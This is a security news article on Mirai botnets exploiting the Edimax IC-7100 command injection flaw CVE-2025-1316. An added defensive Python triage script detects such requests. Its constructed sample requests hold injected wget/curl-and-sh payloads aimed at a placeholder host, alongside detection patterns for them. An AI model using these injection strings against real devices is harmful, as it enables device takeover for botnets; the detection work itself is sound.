Mirai-based botnets exploit CVE-2025-1316 zero-day in Edimax IP cameras
Mirai-based botnets are exploiting a zero-day flaw, tracked as CVE-2025-1316, in Edimax IP cameras, to achieve remote command execution.
US CISA warns that multiple botnets are exploiting a recently disclosed vulnerability, tracked as CVE-2025-1316 (CVSS score of 9.8), in Edimax IC-7100 IP cameras.
The issue is an Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’).
The Edimax IC-7100 fails to properly sanitize requests, so an attacker can create specially crafted requests to achieve remote code execution on the device. Report suspected malicious activity to CISA for tracking and correlation with other incidents.
“Successful exploitation of this vulnerability could allow an attacker to send specially crafted requests to achieve remote code execution on the device,” reads the advisory published by CISA. “Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.”
The flaw impacts all IC-7100 IP Camera versions, and the vendor has yet to address the vulnerability because these cameras are end-of-life products.
The advisory doesn’t confirm exploitation of the flaw in the wild; however, the US agency urges organizations to report suspected malicious activity for tracking and correlation.
Akamai researchers discovered the vulnerability, and the cyber security firm confirmed ([1],[2]) that the flaw is actively exploited in the wild.
The experts observed multiple Mirai-based botnets that are currently exploiting multiple flaws, including the one in Edimax IC-7100 IP cameras.
Threat actors exploit remote command execution to run a shell script that downloads a Mirai malware payload from a remote server.
The vendor, notified in Oct 2024, has been unresponsive to CISA and Akamai. Akamai warns that the vulnerability may affect supported products as well.
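Because the cameras will not be patched, defenders are left with hunting for the behaviour described above: a request that injects a shell command which downloads and runs a script. The following triage sketch is an added example, not code from CISA, Akamai or the vendor. The article does not name the vulnerable endpoint or parameter, so the `PLACEHOLDER.cgi` path, the parameter names and the sample request lines (with documentation-range IP addresses) are all constructed.

```python
import re
from urllib.parse import unquote_plus

# Shell metacharacters that let injected text start a new command.
SEPARATOR = re.compile(r";|\|\||&&|\||`|\$\(|\n")
# Tools commonly used to pull a script or binary from a remote server.
FETCH = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
# Signs the fetched file is then run: pipe to a shell, "sh file", chmod, ./file.
EXECUTE = re.compile(
    r"\|\s*(ba|a)?sh\b|\b(ba|a)?sh\s+\S+|\bchmod\s+\+?[0-7x]+|\./\S+", re.I)

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_line):
    """Return 'high', 'medium' or 'none' for one HTTP request line."""
    parts = request_line.split(" ")
    # Keep only the request target (drop the method and the protocol version).
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else request_line
    text = decode(target)
    if not (SEPARATOR.search(text) and FETCH.search(text)):
        return "none"
    return "high" if EXECUTE.search(text) else "medium"

def triage(lines):
    """Return (severity, line) pairs for every suspicious request line."""
    scored = ((classify(line), line) for line in lines)
    return [(level, line) for level, line in scored if level != "none"]

# Constructed sample request lines; the path and parameters are placeholders.
SAMPLES = [
    "GET /index.html HTTP/1.1",
    "GET /cgi-bin/PLACEHOLDER.cgi?name=cam1&mode=day HTTP/1.1",
    "POST /cgi-bin/PLACEHOLDER.cgi?name=cam1%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F192.0.2.10%2Fs.sh%3Bsh%20s.sh HTTP/1.1",
    "GET /cgi-bin/PLACEHOLDER.cgi?name=x%253Bwget%2520http%253A%252F%252F192.0.2.10%252Fm%2520-O-%257Csh HTTP/1.1",
    "GET /cgi-bin/PLACEHOLDER.cgi?name=a%60curl%20192.0.2.10%60 HTTP/1.1",
    "GET /search?q=curl+tutorial HTTP/1.1",
]

if __name__ == "__main__":
    for level, line in triage(SAMPLES):
        print(level, line)
```

A "medium" hit (command separator plus a download tool, no execution step) still deserves review, since the run step can arrive in a later request.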
(SecurityAffairs – hacking, US CISA)